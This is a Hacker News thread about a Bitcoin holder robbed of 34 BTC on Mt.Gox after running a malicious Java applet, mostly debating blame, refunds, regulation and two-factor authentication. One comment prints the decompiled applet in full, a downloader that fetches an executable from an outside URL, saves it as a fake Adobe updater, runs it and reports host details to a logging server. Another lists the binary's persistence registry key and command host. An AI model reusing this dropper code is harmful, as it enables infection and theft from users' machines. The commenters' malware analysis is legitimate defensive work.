
How I got robbed of 34 btc on Mt.Gox today - pieter
https://bitcointalk.org/index.php?topic=173227.0
======
RyanZAG
Isn't this exactly what Bitcoin was created for - to allow unregulated access
to currency? I guess people don't really realize what unregulated actually
means - and nor do they realize why you really do want regulated currency.

This kind of thing happens all the time with real banks, but with real banks,
all transactions can be traced and reversed. Law enforcement can follow the
required documentation to find the owner of any account on a global level.
This is exactly what Bitcoin was created to avoid.

Well guess what? When you avoid the regulation, you take the safety of the
currency into your own hands. MtGox should not refund this in any way shape or
form. The problem was entirely his fault. He did not secure his MtGox account
with available two-factor authentication. He ran untrusted code at full
permission on his PC. He needs to take some responsibility for his own use of
an unsecured currency on an unsecured website with unsecured authentication
and running untrusted code.

Zero sympathy from me. Maybe it will be a wake up call to others to actually
think about their decisions. Shouting about the 'nanny state' and using
bitcoin, and then turning around and looking for a nanny to help him out when
he goes around it is pathetic.

~~~
code4life
We don't need sympathy or regulation. A simple market solution like voluntary
bitcoin insurance would do the trick.

~~~
Pinckney
How do you propose to defend against insurance fraud? With mixing services
available, there would seem to be very little risk in robbing one's own
account.

~~~
dgabriel
You make the insurance price and due diligence bar high enough.

------
mootothemax
_Mtgox has clearly not had time to respond, and I fear they will claim this is
my fault as I have seen in other posts online that they say "report it to the
police".

They should compensate me 100%._

This shows one of the fundamental problems with Bitcoin-related services: when
people get taken advantage of, they expect to be compensated.

While in the real world, banks will often compensate you if you're the victim
of fraud, there isn't any equivalent for Bitcoin, despite people _really
expecting_ it.

~~~
DanBC
...and banks will only compensate if they really have to because there are
laws compelling them to do so. If they can get away with saying it's your
fault they will.

While I have sympathy for the author it was a pretty silly thing to do.

~~~
danielweber
"Federal Reserve Regulation E guarantees that US consumers are made whole when
their bank passwords are stolen"

From
[http://research.microsoft.com/apps/pubs/default.aspx?id=1618...](http://research.microsoft.com/apps/pubs/default.aspx?id=161829)

Of course, as that paper points out, the traditional electronic money system
is incredibly reversible. If someone transfers $50,000 from my personal bank
account to someone else's bank account, it's pretty easy for it to be undone.

The bottleneck is the money mules who are hired (read: suckered) into engaging
in irreversible transactions.

~~~
salvadors
> If someone transfers $50,000 from my personal bank account to someone else's
> bank account, it's pretty easy for it to be undone.

That depends on the timeframe. Once the money has been moved out of that new
account again things start getting much harder.

~~~
jeremyjh
Not really. If a Bank gets a reversal before funds have cleared its pretty
straightforward and the stack will almost unwind itself as each Bank reverses
credits to the accounts in response to reversals before them. Depending on
type of transfer yes there is a date beyond which reversals are not possible
but the number of transfers has little to do with it.

~~~
danielweber
Thieves want to work to empty that new account as fast as possible. And they
still can't without suckers who volunteer to run a "check-cashing business" or
similar scam.

 _Because_ banks are held responsible for fraud (from consumer accounts), they
work hard to never be the ones holding the bag, so they put up roadblocks in
attempts to engage in irreversible transactions. If you say "hey, I opened my
account yesterday, now I want to withdraw the $40,000 that just showed up in
it, 10's and 20's please" they will nod politely and call a bank manager.

------
amanvir_sangha
Some basic analysis of the binary:

Creates the following directories:

    
    
        %UserProfile%\537214
        %UserProfile%\684544
        %AppData%\dclogs
    

Creates a new registry value (so that it runs every time on startup)

    
    
        [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
        537214 = "%UserProfile%\537214\svhost.exe"
    

Tries to connect to:

    
    
        tamere123.no-ip.org on ports 80 and 1604
    

The subdomain above leads to the following IP:

    
    
        198.203.29.120
    

Which, according to iplocation.net is located in:

    
    
        Los Angeles
        California
        ISP: Hugeserver Networks Llc
    

It's very unusual for malware to be hosted in USA so I would assume that
either it is a compromised computer/bot or it is some script kiddie using his
home connection, the latter is more likely since there were no exploits used
just social engineering and luck.

File hashes:

    
    
        MD5: 0x81F8E4C33ADECE6BF89EF171D9930282
        SHA-1: 0xF540BA6C5F1C2AA50B81A440E7D74F8CF588B4D7

~~~
TazeTSchnitzel
<https://news.ycombinator.com/item?id=5531500>

It's a service by script kiddies for script kiddies.

------
dreen
So... you ran a Java applet on a domain with mtgox in its name and didn't make
sure that site is owned by MtGox?

I'm sorry for your loss but what happened is your own fault entirely and I
would be surprised if MtGox decides to refund you.

~~~
burntsushi
> I would be surprised if MtGox decides to refund you

I agree that MtGox shouldn't be doing any kind of refunding in this case.

> what happened is your own fault entirely

You're blaming the victim.

If I'm walking down a dark alley and someone pulls a gun on me and takes my
wallet, is it _my fault_ because I decided to walk down a dark alley? Not at
all.

The only person at fault here is the cracker who perpetrated the scam.

The only thing you can say about the victim in this case is that they aren't
very sensible. Just like walking down dark alleys might not be sensible. But
it's not the OP's fault that someone stole something from him.

~~~
sequoia

            +-------------------------------------------------------+
    	|                  SECURITY WARNING!                    |
    	|  You are attempting to walk down a dark alley,        |
    	|  which could be dangerous.  Only walk down            |
    	|  dark alleys you are familiar with and trust.         |
    	|  By walking down this alley you assume responsibility |
    	|  for the attendant risks.                             |
    	|                                                       |
    	|  Do you still wish to walk down the dark alley?       |
    	|  [x] Yes         [ ] Cancel                           |
    	+-------------------------------------------------------+  
    

Perhaps a better phrasing that "your own fault" is "it was 100% in his power
to prevent this from happening. He is responsible for the fact that it
happened."

~~~
mikeash
Fault and blame is not zero-sum, a point many people seem to miss. Realizing
that the victim has some (and he certainly does here, and in many other cases)
does not in any way reduce what attaches to the perpetrator.

------
Pezmc
TLDR; OP runs java applet (either in browser or downloaded it). Java applet
sends bitcoin from OP's MtGox account to the 'hackers' bitcoin address, using
the OP's browser, which was logged in to his MtGox account at the time.

~~~
ben0x539
Yeah, this has fuck-all to do with bitcoins. Same thing could have happened
with real money through paypal or a bank's website, except those are probably
a few steps ahead of babby's first online banking website in terms of
migitating against likely attack vectors.

------
tripzilch
So, how about if you could have a Linux boot image onna stick, properly
secured, no Java, several BitCoin apps preinstalled and optimized to boot
extremely quickly into what would basically be a sort of BitCoin Wallet
dashboard interface.

You could plug in the USB, hibernate, flip the switch and be Bitcoin banking
within seconds. Then unhibernate and get on with whatever you were doing on
your day-to-day OS.

That way it can be completely separate from whatever risky, dangerous and/or
irresponsible things you do on a regular basis with your computer--things that
seemingly are worth the risk as long as they don't directly give attackers
access to thousands of $$$ digital cash.

Question, I'm making a rough guess that a realistic speed-optimized fast boot-
time for a Linux OS that doesn't need to do much is in the order of five
seconds, is that about right? Also, I'm not 100% sure if that hibernation
trick is actually possible, I've never really seen it on multi-boot systems
and I wonder why, but from what I understand about hibernation (RAM gets saved
to HD, restored next boot) the components are there?

And, make it look unlike any other OS, to make users instantly aware if
they're operating on their banking/money "inside the stick" or "out in the
open" (on the regular OS). For instance, a glowy green CRT terminal filter.

~~~
ConceitedCode
The biggest issue I see would be updating the block chain for the wallet
between uses. Seems like it takes longer and longer to update. Moved my wallet
to a new computer last night and it's been going for the last 5 hours.

~~~
cookiecaper
If you download the blockchain from the P2P wallet client it always takes
forever. You should download the blockchain once, put it on a USB drive, and
then copy it into .bitcoin before you bootstrap a new machine with a wallet.

There are also sites that offer downloads of tar'd versions of the blockchain,
or torrents. Pretty much anything is going to be faster than downloading via a
bitcoin client.

~~~
tripzilch
This thread appears to have a download/torrent for a recent version of the
blockchain data. It's about 4.7GB, apparently.

<https://bitcointalk.org/index.php?topic=145386.0>

So does that mean if you're not using BC via a wallet service, it requires at
least 4.7GB of disk space in order to do its thing? How is this amount of data
expected to grow in the future?

~~~
lmm
It's going to grow hugely (at least as long as punters keep using bitcoin);
there's an expectation that clients will switch away from using the full
history sooner or later, and there are mechanisms prepared for remaining
reasonably secure with shorter histories.

~~~
sliverstorm
Hah, so eventually only a few people like central power figures in the bitcoin
community will be running with the full blockchain eh? Probably my favorite
thing about bitcoin is how, despite its explicit goals, the more adoption it
sees the more it looks like it will turn into the same old thing we already
have.

~~~
lmm
I remember a friend making a similar comment about EVE online: you set people
loose in this anarchistic, libertarian blank state, give them a few years,
and... turns out they'll band together into gangs with leaders, that develop
into communities with formal governance processes; neighbours helping each
other out grows into insurance syndicates....

We've already seen people wanting an authority to compensate them when their
bitcoins are stolen; bitcoins are meant to behave like cash, but an FDICed
bank account is much more useful than cash for most people. That said, as long
as the full feed remains open to anyone who has the spare compute power/disk
space and wants to connect up to it, there's still a big difference from the
existing financial system.

------
antr
I'm not doubting Bitcoin's potential to become a _true_ currency, but unless
this type of smash-and-grab situation can be traced/avoided/insured (whatever
the right mechanism is) it is going to be extremely hard to make ordinary
businesses and people use it. People don't place value in the currency itself,
but the system that provides certain security around it.

~~~
hodgesmr
Banks that handle USD follow strict federal regulations on security procedures
and insurance. If this happened at a bank, the OP would absolutely get his
money back. Bitcoin needs federal regulations... oh wait...

~~~
antr
Agree. When a transaction is not authorised by the account holder, this
transaction is legally invalid. _Any_ bank would _give_ the money back in this
kind of situation.

I can't imagine my parents (or 99% of the adult population) being liable for
this theft when "proper security precautions" means knowing when to detect and
avoid a "0 day java exploit with a cross site injection attack".

~~~
lucian1900
Not really. Most banks I've asked would not refund if the victim did not take
proper security measures, and the OP in this case most certainly did not.

~~~
danielweber
Banks are required to make users whole, even if the user's password is
compromised. At least for individual accounts. (For businesses the situation
is different.)

[http://research.microsoft.com/apps/pubs/default.aspx?id=1618...](http://research.microsoft.com/apps/pubs/default.aspx?id=161829)

~~~
lucian1900
It depends very much on local laws in your country, from what I've seen.

------
TazeTSchnitzel
From the source of mtgox-chat.info:

    
    
      <applet name='ChatBox' width='10' height='10' code='wDbIDcgeH.class' archive='wDbIDcgeH.jar'></applet>
    

Yep, probably an exploit, there aren't many good reasons for a 10x10 applet.
Let's download the jar. It contains a single 3.5KB payload. Let's use a Java
decompiler (JD-GUI).

    
    
      import java.applet.Applet;
      import java.applet.AppletContext;
      import java.io.BufferedInputStream;
      import java.io.BufferedOutputStream;
      import java.io.FileNotFoundException;
      import java.io.FileOutputStream;
      import java.io.IOException;
      import java.net.InetAddress;
      import java.net.MalformedURLException;
      import java.net.URL;
      import java.util.logging.Level;
      import java.util.logging.Logger;
    
      public class wDbIDcgeH extends Applet
      {
        static String lik = "h?t?t?p?:?/?/?w?w?w?.?g?a?l?a?x?y?j?d?b?.?c?o?m?";
    
        public static void logme(String paramString)
        {
          String str1 = lik.replace("?", "");
          String str2 = "PoutineCoutu";
          try {
            String str3 = InetAddress.getLocalHost().getHostName().replace(" ", "-");
            URL localURL = new URL(str1 + "/insert.php?" + "&o=" + System.getProperty("os.name").replace(" ", "-") + "&u=" + str2 + "&ip=" + str3 + "&e=" + paramString);
            localURL.openStream();
          } catch (IOException localIOException) {
            localIOException.printStackTrace();
          }
        }
    
        public void start()
        {
          String str1 = "no";
          String str2 = System.getenv("APPDATA");
          String str3 = System.getProperty("java.io.tmpdir");
          String str4 = "http://g2f.nl/0lczsoo";
          String str5 = str2 + "\\";
          String str6 = "AdobeUpdate-Setup1.84##e";
          String str7 = "f.R.q.w.v.k.p.g.E.q.w.v.w";
          String str8 = "CodedByOrpheu";
    
          String str9 = str5.concat(str6.replace("##", ".ex"));
          BufferedInputStream localBufferedInputStream = null;
          try {
            localBufferedInputStream = new BufferedInputStream(new URL(str4.replace("##", ".ex")).openStream());
          } catch (IOException localIOException1) {
            if (str1 != "yes") logme("Noa");
            str1 = "yes";
            Logger.getLogger(wDbIDcgeH.class.getName()).log(Level.SEVERE, null, localIOException1);
          }
    
          FileOutputStream localFileOutputStream = null;
          try {
            localFileOutputStream = new FileOutputStream(str9);
          } catch (FileNotFoundException localFileNotFoundException) {
            Logger.getLogger(wDbIDcgeH.class.getName()).log(Level.SEVERE, null, localFileNotFoundException);
          }
    
          BufferedOutputStream localBufferedOutputStream = new BufferedOutputStream(localFileOutputStream, 1024);
          byte[] arrayOfByte = new byte[1024];
          try
          {
            int i;
            for (long l = 0L; (i = localBufferedInputStream.read(arrayOfByte)) != -1; l += i)
              localBufferedOutputStream.write(arrayOfByte, 0, i);
          }
          catch (IOException localIOException2) {
            if (str1 != "yes") logme("Noc");
            str1 = "yes";
            Logger.getLogger(wDbIDcgeH.class.getName()).log(Level.SEVERE, null, localIOException2);
          }
          try {
            localBufferedOutputStream.close();
          } catch (IOException localIOException3) {
            Logger.getLogger(wDbIDcgeH.class.getName()).log(Level.SEVERE, null, localIOException3);
          }
          try {
            localBufferedInputStream.close();
          } catch (IOException localIOException4) {
            Logger.getLogger(wDbIDcgeH.class.getName()).log(Level.SEVERE, null, localIOException4);
          }
          try {
            Runtime.getRuntime().exec(str9);
            logme("Yes");
          } catch (IOException localIOException5) {
            logme("Nod");
            Logger.getLogger(wDbIDcgeH.class.getName()).log(Level.SEVERE, null, localIOException5);
          }
          try
          {
            getAppletContext().showDocument(new URL("0"), "_self");
          } catch (MalformedURLException localMalformedURLException) {
            System.exit(0);
    
            localMalformedURLException.printStackTrace();
          }
        }
    
        public void init() {
          start();
        }
      }
    

Well, I can't decipher that, but some security expert might be able to see
what's going on.

~~~
Pezmc
It sends log messages to <http://www.galaxyjdb.com> with your OS information
and the state of the app..

    
    
        /insert.php?o=*os.name*&u=*APPDATA*&ip=java.io.tmpdir&e=*APPSTATE*
    

It appears to download an exe from <http://g2f.nl/0lczsoo>

Then it tries to execute the exe:

    
    
        System.getenv("APPDATA") + "\\AdobeUpdate-Setup1.84.exe";
    

If at any point in the process it hits an exception, it sends the code for
that exception to the galaxy web address, presumably so the dev can see how
the app is performing.

Now normally it wouldn't be able to execute the exe (no access to the
filesystem), but it looks like the applet requests elevated permissions from
the user to allow it to access/run files.

~~~
DanBC
AVG detects this as Luhe.Fiha.A

Here's a mnetion from 2011:

([http://answers.microsoft.com/en-
us/windows/forum/windows_7-s...](http://answers.microsoft.com/en-
us/windows/forum/windows_7-security/what-is-luhefihaa-detected-by-avg-
antivirus-on-5/39ec50b5-fffb-4ff8-bb77-c7d6f35a6d62))

So, someone using an OS heavily targeted by malware decides not to use anti-
malware software, and to have javascript and apparently java enabled in the
browser, and then chooses to visit an URL advertised in a chat window - that
URL is unknown to that person, does not match the URL they're on but claims a
link to the URL they're on, etc etc.

It's a shame someone got robbed, and the responsibility is clearly on the
criminal to not engage in criminal behaviour.

But come on; don't just give them your money.

EDIT: I just read the first answer to the MS post above. It's baffling.

> _On reflection the best and easiest recourse might be to just tell AVG to
> "ignore" this "infection." Is this thing actually a virus? or an infection?
> I have seen no operational problems, nothing in chkdsk, sfc, Registry
> Mechanic, etc., to concern me._

Totally unrelated to MtGox but: someone has anti-malware software. That
software tells them it's found an infected file. There's no evidence this is a
false positive. Rather than wipe and re-install (a distressingly unpopular
choice) or using anti-malware tools to clean the infection the advice is to
train the software to ignore the infection.

MS is stuffed. There is _nothing_ they can do to repair their malware
reputation when the users are that stupid.

~~~
tallanvor
This isn't just an MS problem. Macs have the problem where users still believe
their OS isn't vulnerable to malware and as such aren't careful either.

------
Cakez0r
He seems to think MtGox should compensate his loss, but I really don't see how
it's their fault. The guy fell victim to a phishing scam, plain and simple. It
was completely out of MtGox's hands.

------
tripzilch
> I then discovered that the site is loaded with a java script which, based on
> an initial analysis by my java programmer friend, is a 0 day java exploit
> with a cross site injection attack, which automatically started

"Being a techie", I like to confuse Java and Javascript ...

~~~
jotaass
Well, he did put a space there. I'd give him a pass.

~~~
tripzilch
I would have, but then the term " _cross site_ injection attack", is again
Javascript terminology (he probably meant XSS or CRSF, but the term "cross
site" doesn't really apply to Java applets).

However, the guy just got hacked out of about $8k worth of BC, which sucks,
and for that I do give him a pass :)

~~~
Intermernet
I'm assuming you mean "XSS or CSRF". In both cases the first 2 letters denote
"Cross Site".

But, I'm picking hairs, and as you say, the guy just lost a shed-load of coin,
so mostly sympathy (with a bit of urge to educate) from this end.

EDIT: Sorry, your comment was slightly ambiguous, I apologize for picking on a
typo, I originally thought you were saying that XSS and CSRF had nothing to do
with "Cross Site" which, upon reading again, I noticed was not the case.
(Also, I made the same typo (CRSF) while typing this and only caught it just
before hitting the submit button!)

~~~
tripzilch
Well abovethread it turns out he must have clicked through all sorts of Java
certificate warning boxes, or run an old vulnerable Java version -- now I feel
about as sorry for him as someone whose laptop got stolen as they left it
unattended on the table in a coffeeshop for a toilet break. You can wait for
something to happen like that.

------
fmavituna
A bit off topic, but if you care about security DO NOT INSTALL JAVA to your
computer. I'm JAVA free for the last ~5 years and I never really needed it.

Java's security track is horrible and it's quite popular target.

~~~
Tomdarkness
I think that is a bit extreme. I'd suggest rather than not installing Java at
all just to not install/disable the browser addons that allow java applets to
execute. This way the only way you are going to be executing anything Java is
by downloading the .jar (or a executable wrapper) and running it.

To me if you have to download the .jar and run it then that is no different to
downloading an executable and running it and should take the appropriate
precautions as you would with executables.

There are plenty of legitimate Java applications out there that are used by a
wide spectrum of people from gamers (minecraft) to enterprise developers
(JavaEE, java application servers, etc.).

~~~
andyhmltn
How is it extreme? The only time I've needed java is for minecraft. Luckily
I'm not rocking windows so the chance of being hit by a 0-day is a bit lower
(correct me if I'm wrong.)

But stopping the chance of having everything in your digital (and in the case
of money, personal) life stolen because you clicked on a link FAR outweighs
the benefit of playing minecraft imo.

~~~
Tomdarkness
I think you need to go back and read what you replied to.

Having Java installed but with Java disabled in your browser, like I
suggested, means Java applets won't run in your browser at all. You'd need to
download and execute the .jar or wrapper (which would be a executable anyway)
which is no different from downloading any normal executable and running it.

~~~
andyhmltn
Well yes I agree on that actually. Probably should've thought that through.

------
smoyer
I wonder how much the of the increase in MtGox accounts and MtGox trading
volume (discussed here: <https://news.ycombinator.com/item?id=5529986>) is due
to this malware. If I was the author of this program, I'd spread the trading
out over a large number of accounts and hit as many people as I could in a
short time period (once the news gets out, this exploit will be _much_ less
effective).

------
jack_trades
How useful is a "currency" if it 1) has volatility like a penny stock and 2)
raises the stakes on 0-day defense to something ridiculous?

When I hear interviews where people (bitcoin founder) suggest that you don't
transfer into bitcoins any state currency you aren't willing to lose... it
sort of peels the "inflation-hedge" covers off the whole thing. How unstable
and unsecure does a currency have to be to be nearly worthless? USDollars look
pretty safe again.

This is so much a game of hacker gambling. A great experiment. Too bad it
consumes so much productive time and energy.

The beautiful narrative of the reclusive, open-society, eastern hacker that
designs this thing which grows to be the godzilla it is... The story arc on
bitcoin is borderline trite. Michael Bay is all over this in a year.

------
amalag
Is funny that people throw around words like "java script 0 day exploit" and
then post:

>Then and there someone posted a link to www mtgox-chat info (do not open
unless you know what >you are doing) claiming a video announcement that mtgox
was going to start trading litecoins. >I clicked on the link, the website
opened, not much happened, and the "video"/chatbox never loaded. >I then
forgot about this website.

------
sequoia
I'm really confused by the title, in particular the "on Mt.Gox" part. Was he
"on Mt.Gox['s website]" when he came across this applet? He makes it sound
like the exploit was _on_ mt. gox.

If he got a trojan on a third party site that compromised his computer and Mt.
Gox's site had nothing to do with it, this title seems a bit libelous. If in
fact that's the case, I'd implore HN mods to change the title to something
that doesn't unfairly cast aspersions on the Mt.Gox site.

 _FWIW: I have no bitcoins, I don't fully grok bitcoins, I'm scared of
bitcoins, I don't use mt.gox or any vendor_

~~~
ScottBurson
You have a point. His protestations notwithstanding, Mt. Gox does not appear
to bear any responsibility for this at all. What happened was, he let his
browser get pwned while he had his Mt. Gox account open in another tab. The
coins were taken from his Mt. Gox account, but the security breach was on his
end.

------
axefrog
MtGox really does run a subpar operation. There should be additional security
checks when transferring money out of an account, and there should be the
option to enable multifactor authentication. Back when they were originally
hacked, this should have become top priority for them, along with making their
service rock solid. If people are hacking and stealing from you, it's obvious
you have something of value and need to take steps to protect what you have,
_especially_ when it's being held on behalf of a customer.

~~~
DanBC
This wasn't someone hacking MtGox.

This was someone on a vulnerable OS, running without malware protection, with
Java active in the browser, visiting an unknown link, and possibly giving an
application permission to run. (Although maybe it didn't need permission to
run?)

To get to that point the person needed to ignore several well established
security principles.

~~~
StavrosK
Oh come on, how hard is it for MtGox to implement TOTP and tell users to
download Google Authenticator? It's not really that much hassle to enter a
code each time you want to make a transaction, and these things wouldn't
happen.

Sure, the user was being stupid here, but MtGox didn't do them any favors
either.

~~~
zwily
"Oh come on, how hard is it for MtGox to implement TOTP and tell users to
download Google Authenticator?"

Not hard, and they did it a long time ago. The user didn't opt in.

~~~
axefrog
When I signed up for an account, there was no obvious prompting to go and turn
it on. It's all well and good having extra security, but if you don't actively
try to get your users to make use of it, it's only going to be marginally
useful.

~~~
DanBC
That user was aware of extra MtGox security and chose not to use it.

On top of that the user

1) Chose to turn off (or not use) malware software

2) Enabled Java in the browser

3) Chose to visit a short url link presented in a chat window

4) Clicked through a big scary warning

All while still logged into their MtGox account.

It sucks that they're a victim of crime, but their actions were dumb.

------
Tarilo
This is exactly why everyone on the internet keeps saying that you shouldn't
automatically run Java applets or shouldn't have Java installed at all on your
computer.

Java is just such a big target for hackers nowadays, that there will always be
zero-days.

~~~
teraflop
The funny thing is, this particular attack doesn't even involve a Java
vulnerability. You have to either specifically grant the applet elevated
permissions (giving it full access to your computer) or download and run
something that claims to be a "Java updater" from the "g2f.nl" domain.

~~~
tocomment
What I'm not getting is how a running executable can log into a website and
initiate a transaction. It won't have your password right? Or is it just a
keylogger to catch your password?

~~~
dariopy
Like your regular XSRF, it relies on the user already being logged in some
browser tab.

It probabley has a keylogger too.

------
plg
I'm having trouble understanding the OP's problem with mt. gox. Is it that the
OP wants mt. gox to have somehow prevented him from downloading and running
malicious java code from some other third party website? (WTF dude) or is it
more specific, that the OP thinks mt. gox should have somehow prevented the
OP's credentials from being sniffed by said malicious program?

------
0x0
This is probably not much different from any other internet banking trojan
horse delivered via a java exploit.

Some banks solve this problem by requiring a 2 factor auth to confirm
transactions (even after logging in).

------
niggler
Best comment from the thread: "Friends don't let friends use Windows +
Bitcoin."

------
jes5199
The non-reversibility of bitcoin transactions is a huge liability. Our current
state of software technology was designed in a world where the most
valuable/dangerous thing you could possibly have on your disk or on a web site
was, what, your ssh keys? Nude photos of yourself?

The value of hacking, phishing, etc is significantly increased by the presence
of bitcoins.

I guess you could argue that if bitcoins are popular, software practices will
evolve to be much more secure - but until then, it's wild west, and much more
wild than the internet ever was before.

------
willvarfar
Is there a way that MtCox or somewhere could keep a blacklist of 'stolen'
coins? So that they become worthless because nobody would be able to trade
them?

~~~
bonzoesc
Without making that database universal it just means some poor merchant that
accepts bit coins is going to get stiffed.

~~~
willvarfar
but it'd be viral so be universal. Merchents and absolutely everyone would all
quickly start checking just to ensure they don't get coins they can't trade,
making it effectively universal.

Which means it comes down to convincing the gatekeeper that you were burgled.
But that's a human level problem.

~~~
chii
and whoever that controlled that list would basically control bitcoins,
because they could charge a levy or else they'd put your bitcoin into that
list.

~~~
bonzoesc
Yup, way to put a centralized control on your decentralized "currency."

------
halcyondaze
No offense to bitcoiners, but what are people expecting when the biggest
exchange is "Magic The Gathering Online Exchange" for this "currency" ?

------
Tomdarkness
I've not used Mt.Gox but does it let you perform transactions without
authenticating again? Even if you were logged in to your account, I'd expect
any kind of financial related website to perform some kind of re-
authentication before processing any transaction. Perhaps with the exception
of transferring funds to somewhere you've sent funds in the past.

~~~
wting
You have the option of enabling two-factor authentication for various actions:

<http://i.imgur.com/5I31WcX.png>

------
wereHamster
"site is loaded with a java script" - srsly? You do ebanking (or ebitcoining)
on a computer which has java installed?

~~~
Intermernet
I hate to say it, but (at least in Australia) many banks require Java to do
business banking.

This should change (at the glacial rate banks change things) as they realise
that Java in the browser is risky business.

This may change if Oracle pull their finger out, stop being dicks about the
licensing, and try to promote the language again.

Honestly, I think they've left it too late and the majority of "Java" you're
going to see in the near future is going to be related to Android (and hence
not running on Oracle's stack).

~~~
wereHamster
Then at least have a virtual machine snapshot of a clean install of
OS+Java+Browser and always boot from the snapshot when doing internet
business.

------
smoyer
Java Applets were designed to give you the ability to execute a program on
your computer from the browser in much the same way ActiveX controls _could_
be used for exploits. Turn off Java in the browser and hope that JavaScript is
sandboxed well enough.

~~~
ww520
Java Applets is not designed to give you the ability to execute a program on
your computer from the browser in much the same way ActiveX controls could be
used for exploits.

Only a signed Java applet can ask the user to give permission to access his
computer.

------
egeozcan
I quite like the JVM but I think it should be stopped from running inside a
browser.

~~~
Tarilo
The thing is that it's easy to stop Java applets from executing. Even better
most browser prevent this by default. Including chrome, which he was probably
using as indicated by the screenshot.

Looks like this was entirely his own fault, though it still sucks. Wouldn't
hope for a refund though t.b.h.

~~~
egeozcan
Yes, I guess you're right. Am I being evil when I think that it would have
been great if we could publish security patches for humans? =)

------
dan1234
Doesn't Mt.Gox have any 2 factor auth when it comes to approving transfers?

~~~
Jach
Yup, they use yubikey and in the past have even given free devices to
customers. This guy didn't have one, which is simply irresponsible on his
part.

~~~
tlrobinson
They also support TOTP (Google Authenticator, etc)

------
DanBC
At $200 per bitcoin, this is a $6,800 lesson in "Don't visit random websites".

At least they were open about being robbed. I wonder how many bitcoins were
stolen in total?

EDIT: Has anyone visited the URL to analyse the malware?

~~~
nkvoll
At the current exchange rate, his loss is now down to $2100...

------
dariopy
Maybe I'm missing something something, but where exactly is the exploit here?
(0-day no less)

AFAIU, the user was prompted to accept an autosigned applet, and he did so.
After that, the outcome was inevitable. You may hate java all you like, but it
seems like the user (inadvertently) gave this program permission to steal all
his money.

------
parandroid
Actually, the only thing the hacker didn't do is ask the dude politely to give
him (or her) the money. This wasn't a 0day bug, no XSS. The dude gave the
hacker permission to run any code on his machine, therefore it's completely
his own fault, and has nothing to do with MtGox.

------
oomkiller
I uninstalled all of the Java plugins when the 0 days started coming out a
couple months ago. If you want to be extra safe, you should probably have some
sort of Linux LiveCD without any plugins enabled, that acts as a trusted
environment for banking.

------
supjeff
Why do people trust MtGox again? Didn't something similar to this happen a
year or-so ago where everyone's money disappeared and the ops were like "Yeah
we don't know what happened"? How do we know they aren't fleecing everyone?

------
Osiris
I have a Yubikey account with MtGox. Withdrawals require a long-press of the
key. If you have a significant amount of BTC in MtGox, I would recommend
paying the $20 to get the two-factor authentication key for your account.

------
ghshephard
This makes a lot more sense now:

<https://news.ycombinator.com/item?id=5530247>

------
pan69
Doesn't MtGox send out an email or SMS with a verification code before a
transfer can take place? Ouch...

------
stesch
I get laughed at for using NoScript.

~~~
ben0x539
I use NoScript too, but the OP was lead to believe that they were accessing a
video or an interactive chat, so they would likely have permitted scripts to
run on that page anyway.

------
onbitcoins
<http://onbitcoins.com/2013/04/11/bitcoin-theft-mt-gox-trust/>

A Mt. Gox investor was surprised to see his account suddenly pillaged. Will
Bitcoin theft call into question trust and confidence in the system?

------
danmaz74
Welcome to the far west...

------
drivebyacct2
Man, I'm getting tired of repeating these basic security issues:

Stop storing your wallet online. And if not that, _stop letting flash/java
autoload/run_. Both Chrome and Firefox have "click-to-enable". Not only is it
more secure, it also prevents auto-video-playing, background audio you can't
find and shit like this from happening.

------
Jebbers
LOLarious.

